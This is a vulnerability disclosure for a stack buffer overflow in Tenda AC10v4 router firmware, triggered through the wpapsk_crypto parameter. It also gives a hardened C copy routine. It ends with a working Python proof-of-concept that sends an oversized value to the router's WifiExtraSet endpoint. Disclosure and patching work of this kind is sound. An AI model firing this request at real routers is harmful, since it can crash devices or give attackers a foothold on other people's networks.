Overview

Affected version

AC10v4 V16.03.10.13

Vulnerability details

Tenda AC10v4 V16.03.10.13 has a stack overflow vulnerability in the FUN_0046AC38 function. This function accepts the wpapsk_crypto parameter from a POST request.

Because the user controls the value of wpapsk_crypto, the statement strcpy((char *)&local_1c,__s1); leads to a buffer overflow. strcpy performs no length check, so the user-supplied wpapsk_crypto value held in __s1 can exceed the capacity of the destination buffer local_1c, which triggers the vulnerability.
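
A bounded replacement for the strcpy pattern described above, shown as an added example; it is not the firmware's code or a vendor patch. The buffer size CRYPTO_BUF_SIZE, the cipher allowlist and both function names are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>

#define CRYPTO_BUF_SIZE 16  /* assumed size; the page does not give local_1c's size */

/* Assumed allowlist; the firmware's accepted cipher names are not on the page. */
static const char *const ALLOWED_CRYPTO[] = { "aes", "tkip", "tkip&aes" };

/* Pattern from the advisory, for contrast: copies until NUL, ignoring dst's size. */
void copy_crypto_unsafe(char *dst, const char *src)
{
    strcpy(dst, src);
}

/* Hardened form. Returns 0 and fills dst on success; returns -1 and leaves
 * dst as an empty string when the value is missing, too long, or not allowed. */
int copy_crypto_checked(char *dst, size_t dst_size, const char *src)
{
    size_t i, len;
    if (dst == NULL || dst_size == 0)
        return -1;
    dst[0] = '\0';
    if (src == NULL)
        return -1;

    /* Bounded length scan: stop after dst_size bytes instead of trusting src. */
    for (len = 0; len < dst_size && src[len] != '\0'; len++)
        ;
    if (len == dst_size)            /* no room left for the terminating NUL */
        return -1;

    for (i = 0; i < sizeof(ALLOWED_CRYPTO) / sizeof(ALLOWED_CRYPTO[0]); i++) {
        if (strcmp(src, ALLOWED_CRYPTO[i]) == 0) {
            memcpy(dst, src, len + 1);   /* len + 1 <= dst_size */
            return 0;
        }
    }
    return -1;
}

int main(void)
{
    char buf[CRYPTO_BUF_SIZE], oversized[601];
    memset(oversized, 's', 600);    /* constructed input, same length as the PoC value */
    oversized[600] = '\0';
    printf("aes       -> %d\n", copy_crypto_checked(buf, sizeof buf, "aes"));
    printf("600 bytes -> %d\n", copy_crypto_checked(buf, sizeof buf, oversized));
    return 0;
}
```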

PoC

import requests

url = "http://192.168.1.100/goform/WifiExtraSet"

headers = {
    "Content-Type": "application/x-www-form-urlencoded",
    # Add other headers if needed, such as User-Agent, etc.
}

data = {
    "wifi_chkHz": "0",
    "wl_mode": "a24l",
    "mac": "111",  # Adjust the value as per your actual requirement
    "handset": "0",
    "wpapsk_crypto": "s"*600,  # Verify if this is correct as per your needs
    "wpapsk_key": "bXF"  # Adjust the value as per your actual requirement
}

response = requests.post(url, headers=headers, data=data)

print(response.status_code)
print(response.text)
